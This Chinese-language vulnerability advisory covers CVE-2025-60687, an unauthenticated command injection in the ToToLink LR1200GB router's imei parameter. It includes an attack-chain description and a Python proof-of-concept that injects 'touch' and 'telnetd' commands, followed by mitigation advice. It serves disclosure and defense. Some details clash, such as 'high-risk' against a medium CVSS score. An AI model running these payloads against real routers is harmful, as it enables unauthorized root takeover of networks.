CVE-2025-60687 ToToLink LR1200GB路由器命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-60687

漏洞类型

命令注入

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ToToLink LR1200GB路由器

漏洞概述

CVE-2025-60687是影响ToToLink LR1200GB路由器固件V9.1.0u.6619_B20230130的一个高危安全漏洞。该漏洞存在于路由器的cstecgi.cgi二进制文件中，具体位于sub_41EC68函数。由于该函数对用户输入的"imei"参数验证不足，仅检查长度是否为15个字符，随后直接将参数值通过sprintf()函数拼接到系统命令字符串中，并使用system()函数执行。由于缺乏有效的输入过滤和参数化，攻击者可以通过构造特制的IMEI值注入任意系统命令，在无需任何认证的情况下以root权限在路由器上执行任意代码。此漏洞影响路由器的机密性、完整性和可用性，CVSS评分6.5，属于中等严重程度。由于该路由器通常部署在企业网络和家庭网络中，漏洞被利用可能导致网络被完全控制、敏感信息泄露或被用于进一步的网络攻击。

技术细节

该命令注入漏洞的根本原因在于cstecgi.cgi二进制文件中的sub_41EC68函数存在不安全的输入处理。具体流程如下：首先，函数从HTTP请求中获取"imei"参数；然后仅验证参数长度是否为15个字符；接着使用sprintf()函数将该参数直接拼接到系统命令字符串中，构造形如"some_command imei_value"的命令；最后通过system()函数执行构造的命令。由于sprintf()不会对参数进行任何转义或过滤，攻击者可以在IMEI值中插入分号、管道符等shell特殊字符来终止当前命令并注入新的命令。例如，攻击者可以提交形如"123456789012345;telnetd;"的IMEI值来启动Telnet服务，或者使用更复杂的命令来下载并执行恶意脚本。这种漏洞在嵌入式设备中非常常见，因为这类设备通常使用system()函数来执行系统命令，而缺乏现代安全编程实践。

攻击链分析

STEP 1

步骤1

攻击者识别目标ToToLink LR1200GB路由器，并确认其固件版本为V9.1.0u.6619_B20230130

STEP 2

步骤2

攻击者向路由器的cstecgi.cgi端点发送HTTP请求，在imei参数中注入15位数字前缀后跟随恶意命令

STEP 3

步骤3

sub_41EC68函数接收imei参数，仅验证长度为15字符，然后通过sprintf()将参数拼接到系统命令中

STEP 4

步骤4

构造的命令通过system()函数执行，攻击者注入的命令以root权限在路由器上运行

STEP 5

步骤5

攻击者可以执行任意命令，如启动Telnet服务、上传恶意脚本、建立反向shell等，完全控制路由器

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-60687 PoC - ToToLink LR1200GB Command Injection
# Target: cstecgi.cgi via imei parameter

import requests
import sys

target = "http://target-router-ip"
# Note: Replace 'target-router-ip' with actual router IP

def exploit(target_ip, payload):
    """
    Send malicious IMEI parameter to trigger command injection
    The imei parameter must be exactly 15 characters before the injection payload
    """
    url = f"http://{target_ip}/cstecgi.cgi"
    
    # IMEI is 15 digits, we inject command after 15 chars
    # Example: '123456789012345;touch /tmp/pwned;'
    malicious_imei = "123456789012345;touch /tmp/pwned;"
    
    params = {
        "imei": malicious_imei
    }
    
    try:
        print(f"[*] Sending payload to {url}")
        print(f"[*] IMEI parameter: {malicious_imei}")
        
        response = requests.get(url, params=params, timeout=10)
        
        print(f"[*] Response status: {response.status_code}")
        
        if response.status_code == 200:
            print("[+] Payload sent successfully")
            print("[*] Command should be executed on the router")
        else:
            print("[-] Unexpected response")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")

def start_telnet(target_ip):
    """
    Example: Start telnetd service on the router
    """
    url = f"http://{target_ip}/cstecgi.cgi"
    # Inject command to start telnetd
    malicious_imei = "123456789012345;telnetd;"
    
    params = {"imei": malicious_imei}
    
    try:
        response = requests.get(url, params=params, timeout=10)
        print("[+] Telnetd started (if vulnerable)")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python3 {sys.argv[0]} <router_ip>")
        print("Example: python3 CVE-2025-60687.py 192.168.1.1")
        sys.exit(1)
    
    target_ip = sys.argv[1]
    exploit(target_ip, None)

影响范围

ToToLink LR1200GB 固件 V9.1.0u.6619_B20230130

防御指南

临时缓解措施

在厂商发布修复固件之前，可以采取以下临时缓解措施：1）禁止从公网访问路由器Web管理界面，仅允许通过内网或VPN访问；2）使用防火墙规则限制对路由器80和443端口的访问；3）定期检查路由器是否出现异常进程或配置变更；4）考虑更换为已停止使用或已获得安全更新的路由器型号；5）监控网络流量，关注异常的HTTP请求模式。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-60687
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-60687
3 Details https://www.cvedetails.com/cve/CVE-2025-60687/
4 VulDB https://vuldb.com/cve/CVE-2025-60687
5 Link http://totolink.com
6 Link https://github.com/yifan20020708/SGTaint-0-day/blob/main/ToToLink/ToToLink-LR1200GB/CVE-2025-60687.md
7 Link https://www.totolink.net/